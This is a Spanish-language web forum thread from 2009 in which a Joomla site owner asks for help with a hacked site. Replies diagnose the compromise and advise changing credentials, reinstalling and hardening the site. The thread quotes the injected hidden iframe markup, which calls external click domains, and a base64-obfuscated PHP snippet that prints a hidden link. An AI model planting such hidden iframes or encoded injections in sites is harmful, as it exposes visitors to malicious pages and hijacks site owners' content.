Foros del Web » Creando para Internet » Sistemas de gestión de contenidos » Joomla »

Problemas con Joomla

Estas en el tema de Problemas con Joomla en el foro de Joomla en Foros del Web. Hola amigos tengo instalado Joomla 1.5.12 Pero me esta saliendo un error y un codigo html en mi web: <iframe src="http://dakilfu.com/?click=3293E0" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> Alguien ...
  #1 (permalink)  
Antiguo 14/08/2009, 13:19
Avatar de elfunebrero  
Fecha de Ingreso: julio-2005
Ubicación: Quito
Mensajes: 262
Antigüedad: 18 años, 9 meses
Puntos: 3
Problemas con Joomla

Hola amigos tengo instalado Joomla 1.5.12

Pero me esta saliendo un error y un codigo html en mi web:

<iframe src="http://dakilfu.com/?click=3293E0" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Alguien que pueda hecharme una mano?

Saludos
__________________
Sinmiedos!
Hosting Empresas
  #2 (permalink)  
Antiguo 15/08/2009, 00:40
rqd
 
Fecha de Ingreso: julio-2008
Mensajes: 228
Antigüedad: 15 años, 9 meses
Puntos: 8
Respuesta: Problemas con Joomla

ojalá pudieras dar más detalles del error o si es que lo podríamos ver en alguna parte
  #3 (permalink)  
Antiguo 16/08/2009, 09:39
Avatar de elfunebrero  
Fecha de Ingreso: julio-2005
Ubicación: Quito
Mensajes: 262
Antigüedad: 18 años, 9 meses
Puntos: 3
Respuesta: Problemas con Joomla

Cita:
Iniciado por rqd Ver Mensaje
ojalá pudieras dar más detalles del error o si es que lo podríamos ver en alguna parte
Hola mirale el codigo fuente: http://www.galapagosfirst.com/ y ahi tiene esos iframes.

Saludos
__________________
Sinmiedos!
Hosting Empresas
  #4 (permalink)  
Antiguo 16/08/2009, 13:16
rqd
 
Fecha de Ingreso: julio-2008
Mensajes: 228
Antigüedad: 15 años, 9 meses
Puntos: 8
Respuesta: Problemas con Joomla

Es probable que alguno de los plugin que instalaste en tu joomla lo haya puesto como para darle seguimiento a que páginas utilizan el componente.
  #5 (permalink)  
Antiguo 16/08/2009, 15:32
Avatar de NeriAispuro  
Fecha de Ingreso: agosto-2009
Ubicación: Argentina
Mensajes: 9
Antigüedad: 14 años, 8 meses
Puntos: 0
Respuesta: Problemas con Joomla

puede que sea un iframe del lugar donde descargastes el template, seguramente esté en el index del template, te has fijado ahí?
  #6 (permalink)  
Antiguo 16/08/2009, 18:17
Avatar de Larenz
Colaborador
 
Fecha de Ingreso: enero-2007
Ubicación: Nicaragua
Mensajes: 1.398
Antigüedad: 17 años, 3 meses
Puntos: 55
Respuesta: Problemas con Joomla

Puede también que alguien haya entrado a tu sitio (hackeado) y te haya insertado ese código en el archivo index.php de tu plantilla. Te lo comento porque en mis primeros pasos de Joomla me pasó lo mismo, alguien entró a mi sitio, pero en vez de hackearlo poniendo otro index, lo que hizo fue meter código extraño en el index.php de mi plantilla.

Te recomiendo que revises tu index.php y cheques porque si obviamente no has tocado para nada el index y te aparece ese código extraño entonces fue que alguien se hizo con tu user y contraseña.

Muchos hacen esto para obtener algún tipo de click, enlaces externos, etc., etc.......

P.D: Por cierto al abrir tu sitio mis navegadores (Firefox y Google Chrome) me advirtieron que tu sitio usaba algún script altamente peligroso y me prohibían el acceso a tu web. Obviamente salté esta advertencia para ver el sitio en cuestión. Pero deberías checar qué tipo de scritp estás usando para que de esta advertencia y corregir eso.

Última edición por Larenz; 16/08/2009 a las 18:22
  #7 (permalink)  
Antiguo 16/08/2009, 19:02
Avatar de elfunebrero  
Fecha de Ingreso: julio-2005
Ubicación: Quito
Mensajes: 262
Antigüedad: 18 años, 9 meses
Puntos: 3
Respuesta: Problemas con Joomla

Cita:
Iniciado por elfunebrero Ver Mensaje
Hola mirale el codigo fuente: http://www.galapagosfirst.com/ y ahi tiene esos iframes.

Saludos
Hola amigo, estos son los componente que utilizo en mi web:




Me tocara revisar uno por 1?

Saludos
__________________
Sinmiedos!
Hosting Empresas
  #8 (permalink)  
Antiguo 16/08/2009, 19:05
Avatar de elfunebrero  
Fecha de Ingreso: julio-2005
Ubicación: Quito
Mensajes: 262
Antigüedad: 18 años, 9 meses
Puntos: 3
Respuesta: Problemas con Joomla

Cita:
Iniciado por NeriAispuro Ver Mensaje
puede que sea un iframe del lugar donde descargastes el template, seguramente esté en el index del template, te has fijado ahí?
Hola NeriAispuro, el problema me dio primero en el index.php de mi adiministrador:

/www/administrator/templates/khepri/index.php

En el codigo estaba ese iframe, el cual lo quite, pero al momento de quitarlo se me aparecio en toda la web.

Saludos
__________________
Sinmiedos!
Hosting Empresas
  #9 (permalink)  
Antiguo 16/08/2009, 19:06
Avatar de elfunebrero  
Fecha de Ingreso: julio-2005
Ubicación: Quito
Mensajes: 262
Antigüedad: 18 años, 9 meses
Puntos: 3
Respuesta: Problemas con Joomla

Cita:
Iniciado por Larenz Ver Mensaje
Puede también que alguien haya entrado a tu sitio (hackeado) y te haya insertado ese código en el archivo index.php de tu plantilla. Te lo comento porque en mis primeros pasos de Joomla me pasó lo mismo, alguien entró a mi sitio, pero en vez de hackearlo poniendo otro index, lo que hizo fue meter código extraño en el index.php de mi plantilla.

Te recomiendo que revises tu index.php y cheques porque si obviamente no has tocado para nada el index y te aparece ese código extraño entonces fue que alguien se hizo con tu user y contraseña.

Muchos hacen esto para obtener algún tipo de click, enlaces externos, etc., etc.......

P.D: Por cierto al abrir tu sitio mis navegadores (Firefox y Google Chrome) me advirtieron que tu sitio usaba algún script altamente peligroso y me prohibían el acceso a tu web. Obviamente salté esta advertencia para ver el sitio en cuestión. Pero deberías checar qué tipo de scritp estás usando para que de esta advertencia y corregir eso.
Hola Larenz gracias por tu mensaje,

Yo tambien me di cuenta por ese error que me voto mozilla, voy a reemplazar el index.php y cambiar de nuevo las claves y ususarios.

Saludos
__________________
Sinmiedos!
Hosting Empresas
  #10 (permalink)  
Antiguo 17/08/2009, 19:10
Avatar de Larenz
Colaborador
 
Fecha de Ingreso: enero-2007
Ubicación: Nicaragua
Mensajes: 1.398
Antigüedad: 17 años, 3 meses
Puntos: 55
Respuesta: Problemas con Joomla

Vi tu web. Honestamente no me saltó para nada ningún iframe o al menos no logré visualizarlo... pero en el código fuente (creo que un menú) llama directamente a ese url externa a través de un iframe.

Sigo pensando que fue que alguien logró entrar a tu panel de control e hizo ese cambio en tu código fuente de tus archivos.

También este tipo de percances suceden a la hora de descargar módulos, componentes o plugins en sitios warez. Algunos programadores o usuarios avanzados insertan códigos ocultos o encriptados para llamar a ciertas webs. Por ejemplo la plantilla de TemplatePlazza que se llama MyStorePlazza tiene en su index.php un código en php cifrado que llama a la siguiente url www.jsharing.com (el cual seguro es un sitio warez). El código es el siguiente:

Código PHP:
<?php
    
echo base64_decode('PGRpdiBzdHlsZT0iZGlzcGxheTpub25lIj48YSBocmVmPSJodHRwOi8valNoYXJpbmcuY29tIj5Kb29tbGEgSnVzdCBmb3IgU2hhcmluZyAtIEpvb21sYSBDbHViIFRlbXBsYXRlcyBhbmQgRXh0ZW5zaW9uczwvYT48L2Rpdj4=');
?>
Su etiqueta div tiene la función display:none de forma que no se mostrará en el navegador y estará oculto.

Ese es un ejemplo o una idea de lo que una persona maliciosa puede hacernos en nuestros archivos casi sin darnos cuenta. En tu caso está de sobra leer la advertencia que muestra Google Chrome o Firefox al entrar a tu sitio, como para darse cuenta que alguien puso código malicioso.

Tienes que ser cuidadoso y verificar qué otro archivo más pudo haber sido modificado. Muchas veces te puedes auxiliar del mismo Dreamweaver... yo lo configuro para que me busque determinada palabra o código en todo el directorio raíz de Joomla.
  #11 (permalink)  
Antiguo 18/08/2009, 07:06
Avatar de elfunebrero  
Fecha de Ingreso: julio-2005
Ubicación: Quito
Mensajes: 262
Antigüedad: 18 años, 9 meses
Puntos: 3
Respuesta: Problemas con Joomla

Cita:
Iniciado por Larenz Ver Mensaje
Vi tu web. Honestamente no me saltó para nada ningún iframe o al menos no logré visualizarlo... pero en el código fuente (creo que un menú) llama directamente a ese url externa a través de un iframe.

Sigo pensando que fue que alguien logró entrar a tu panel de control e hizo ese cambio en tu código fuente de tus archivos.

También este tipo de percances suceden a la hora de descargar módulos, componentes o plugins en sitios warez. Algunos programadores o usuarios avanzados insertan códigos ocultos o encriptados para llamar a ciertas webs. Por ejemplo la plantilla de TemplatePlazza que se llama MyStorePlazza tiene en su index.php un código en php cifrado que llama a la siguiente url www.jsharing.com (el cual seguro es un sitio warez). El código es el siguiente:

Código PHP:
<?php
    
echo base64_decode('PGRpdiBzdHlsZT0iZGlzcGxheTpub25lIj48YSBocmVmPSJodHRwOi8valNoYXJpbmcuY29tIj5Kb29tbGEgSnVzdCBmb3IgU2hhcmluZyAtIEpvb21sYSBDbHViIFRlbXBsYXRlcyBhbmQgRXh0ZW5zaW9uczwvYT48L2Rpdj4=');
?>
Su etiqueta div tiene la función display:none de forma que no se mostrará en el navegador y estará oculto.

Ese es un ejemplo o una idea de lo que una persona maliciosa puede hacernos en nuestros archivos casi sin darnos cuenta. En tu caso está de sobra leer la advertencia que muestra Google Chrome o Firefox al entrar a tu sitio, como para darse cuenta que alguien puso código malicioso.

Tienes que ser cuidadoso y verificar qué otro archivo más pudo haber sido modificado. Muchas veces te puedes auxiliar del mismo Dreamweaver... yo lo configuro para que me busque determinada palabra o código en todo el directorio raíz de Joomla.
Hola amigo creo que alguien entro a mi host por el FTP, tengo un archivo index.html que yo hice para avisar que estamos haciendo la nueva web...

Y lo extraño de todo esto es que encontre al final del codigo de ese index.html:

<iframe src="http://odiklaf.com/?click=3CDF3A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Pueden verlo aca:
http://www.galapagosfirst.com/index.html

Acabo de cambiar las claves del FTP, de los usuarios, de todo!

Saludos
__________________
Sinmiedos!
Hosting Empresas
  #12 (permalink)  
Antiguo 18/08/2009, 11:02
Avatar de Larenz
Colaborador
 
Fecha de Ingreso: enero-2007
Ubicación: Nicaragua
Mensajes: 1.398
Antigüedad: 17 años, 3 meses
Puntos: 55
Respuesta: Problemas con Joomla

Sabes lo que deberías de hacer primeramente, buscar en tus archivos logs el acceso que se ha tenido a esa ubicación en tus archivos webs y bloquear la ip de la persona en cuestión.

Haciendo esto vas a lograr que el atacante de tu web no pueda acceder, dándote tiempo a ti de volver a montar todo con más seguridad. Pienso que tal vez deberías de volver a montar todos los archivos porque puede que uno de ellos le de acceso a tu web.

Por cierto logré ver el código que mencionas.
  #13 (permalink)  
Antiguo 18/08/2009, 11:20
Avatar de elfunebrero  
Fecha de Ingreso: julio-2005
Ubicación: Quito
Mensajes: 262
Antigüedad: 18 años, 9 meses
Puntos: 3
Respuesta: Problemas con Joomla

Cita:
Iniciado por Larenz Ver Mensaje
Sabes lo que deberías de hacer primeramente, buscar en tus archivos logs el acceso que se ha tenido a esa ubicación en tus archivos webs y bloquear la ip de la persona en cuestión.

Haciendo esto vas a lograr que el atacante de tu web no pueda acceder, dándote tiempo a ti de volver a montar todo con más seguridad. Pienso que tal vez deberías de volver a montar todos los archivos porque puede que uno de ellos le de acceso a tu web.

Por cierto logré ver el código que mencionas.
Si voy hacer lo que me dices amigo, voy a volver a instalar todo desde cero y de paso ver cual es el que me daño mi joomla (que malas experiencias que voy teniendo con este cms).

Y bueno ahi les avisare como me fue.

Saludos
__________________
Sinmiedos!
Hosting Empresas
  #14 (permalink)  
Antiguo 18/08/2009, 11:54
Avatar de Larenz
Colaborador
 
Fecha de Ingreso: enero-2007
Ubicación: Nicaragua
Mensajes: 1.398
Antigüedad: 17 años, 3 meses
Puntos: 55
Respuesta: Problemas con Joomla

Las malas experiencias puedes ocurrir con cualquier cms. No Existe un software seguro, pero sí uno puede lograr hacerlo un poco más seguro. Si han logrado hackear el Pentágono, la NASA, el Army de EUA (que tienen un monitoreo constante y los mejores expertos en seguridad), por qué no podrían lograr hackearnos el nuestro, ¿verdad?

Entonces en este punto te aconsejo seguir medidas de seguridad que muchos expertos en Joomla ofrecen. Siempre es bueno realizar con periocidad un respaldo a la base de datos ya que es el cerebro de nuestra web. Otro punto importante es actualizar los archivos de Joomla como sus componentes y módulos.

Intenta establecer usuarios y contraseñas fuertes y anótalas en tu agenda o cualquier lugar menos en la pc. Protege la carpeta administrator con usuario y contraseña mediante tu panel de control entre otras cosas más que puedes implementar, no para hacer tu sitio IMPENETRABLE, sino para hacerlo MAS SEGURO!
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 23:31.